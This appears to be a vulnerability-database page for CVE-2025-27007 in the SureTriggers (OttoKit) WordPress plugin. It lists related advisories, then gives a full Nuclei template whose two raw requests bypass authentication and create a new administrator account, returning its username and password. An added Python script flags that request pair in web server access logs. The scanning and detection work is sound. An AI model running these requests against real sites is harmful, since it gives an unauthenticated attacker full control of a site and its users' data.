| Title | Published | Views | Reporter |
|---|---|---|---|
| The vulnerability of the SureTriggers plugin of the WordPress content management system allows attackers to increase their privileges. | 13 Jun 2025 00:00 | – | bdu_fstec |
| CVE-2025-27007 | 1 May 2025 11:14 | – | circl |
| WordPress plugin SureTriggers security vulnerability | 1 May 2025 00:00 | – | cnnvd |
| CVE-2025-27007 | 1 May 2025 10:54 | – | cve |
| CVE-2025-27007 WordPress SureTriggers <= 1.0.82 - Privilege Escalation Vulnerability | 1 May 2025 10:54 | – | cvelist |
| SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation | 9 May 2025 00:00 | – | exploitdb |
| WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007) | 13 May 2025 18:49 | – | metasploit |
| PrestaShop - SQL Injection to Eval Injection | 5 Jul 2026 03:01 | – | nuclei |
| CVE-2025-27007 | 1 May 2025 11:15 | – | nvd |
| WordPress SureTriggers Plugin < 1.0.83 Privilege Escalation Vulnerability | 15 May 2025 00:00 | – | openvas |

```yaml
id: CVE-2025-27007

info:
  name: OttoKit < 1.0.83 - SureTriggers allows Privilege Escalation
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Incorrect Privilege Assignment vulnerability in Brainstorm Force SureTriggers allows Privilege Escalation. This issue affects SureTriggers- from n/a through 1.0.82.
  impact: |
    Unauthenticated attackers can create unauthorized connections and escalate privileges to administrator through the SureTriggers REST API endpoints, gaining complete control over the WordPress site.
  remediation: |
    Upgrade to SureTriggers version 1.0.83 or later that implements proper privilege assignment checks.
  reference:
    - https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve
    - https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27007
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-27007
    cwe-id: CWE-266
    epss-score: 0.5088
    epss-percentile: 0.98792
  metadata:
    verified: true
    max-request: 2
    public-query: "/wp-content/plugins/suretriggers"
  tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln

variables:
  username: "admin"
  password: "{{randstr}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  access_key: "{{randbase(10)}}"
  attacker: "{{randstr}}@{{rand_base(5)}}.com"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: OttoKit

        {"sure-triggers-access-key": "{{access_key}}", "wp-password": "a", "connection_status": "ok", "wp-username": "{{username}}", "connected_email": "{{email}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'success'
          - 'Connected successfully.'
        internal: true
        condition: and

  - raw:
      - |
        POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
        Host: {{Hostname}}
        St-Authorization: Bearer {{access_key}}
        Content-Type: application/x-www-form-urlencoded

        selected_options[user_name]=new_{{username}}&selected_options[user_email]={{attacker}}&selected_options[password]={{password}}&selected_options[role]=administrator&integration=WordPress&type_event=create_user_if_not_exists&

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"administrator":true'
          - '"success":true'
          - "new_{{username}}"
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username: new_" + username + " Password: " + password'
# digest: 4a0a004730450221008102b10b5bcff71b07a1593f0d6e0044bd25b4386d2139f2ceaae6f043223c7202207b3d9123e723001db76d197076b35a32b18bf0d3d24c3570d33291c8580b985b:922c64590222798bb761d5b6d8e72950
```
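
The two requests in this template leave a recognisable pair of entries in a web server access log. The following is an added example, not part of the template or the plugin's code: it assumes combined-format logs and that both requests come from the same client address, and it flags clients that receive a 2xx on the connection route and then on the action route. The sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Routes taken from the two requests in the template above.
CONNECT = "/wp-json/sure-triggers/v1/connection/create-wp-connection"
ACTION = "/wp-json/sure-triggers/v1/automation/action"

# Assumed log format: Apache/nginx "combined".
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def rest_path(target):
    """Normalise /wp-json/... and ?rest_route=... request targets to one form."""
    parts = urlsplit(target)
    route = parse_qs(parts.query).get("rest_route", [""])[0]
    return ("/wp-json" + route if route else parts.path).rstrip("/")

def find_sequences(lines):
    """One finding per 2xx POST to ACTION from a client that earlier got a 2xx POST to CONNECT."""
    connected, findings = {}, []
    for line in lines:
        m = LINE.match(line)
        # Access logs carry no POST body, so only method, route and status are checked.
        if not m or m["method"] != "POST" or not m["status"].startswith("2"):
            continue
        path = rest_path(m["target"])
        if path == CONNECT:
            connected.setdefault(m["ip"], m["ts"])
        elif path == ACTION and m["ip"] in connected:
            findings.append({"ip": m["ip"], "connect_ts": connected[m["ip"]],
                             "action_ts": m["ts"]})
    return findings

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [02/May/2025:10:00:01 +0000] "POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1" 200 64 "-" "OttoKit"',
    '198.51.100.7 - - [02/May/2025:10:00:02 +0000] "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1" 200 210 "-" "OttoKit"',
    '203.0.113.9 - - [02/May/2025:10:05:00 +0000] "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1" 403 90 "-" "curl/8.5.0"',
    '203.0.113.20 - - [02/May/2025:10:06:00 +0000] "GET /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1" 404 50 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [02/May/2025:10:07:00 +0000] "POST /?rest_route=/sure-triggers/v1/connection/create-wp-connection HTTP/1.1" 200 64 "-" "OttoKit"',
    '192.0.2.44 - - [02/May/2025:10:07:03 +0000] "POST /index.php?rest_route=/sure-triggers/v1/automation/action HTTP/1.1" 200 210 "-" "OttoKit"',
]

if __name__ == "__main__":
    for finding in find_sequences(SAMPLE):
        print(finding)
```

A hit on a site running 1.0.82 or earlier is a candidate to triage against the WordPress user list for administrator accounts nobody on the team created.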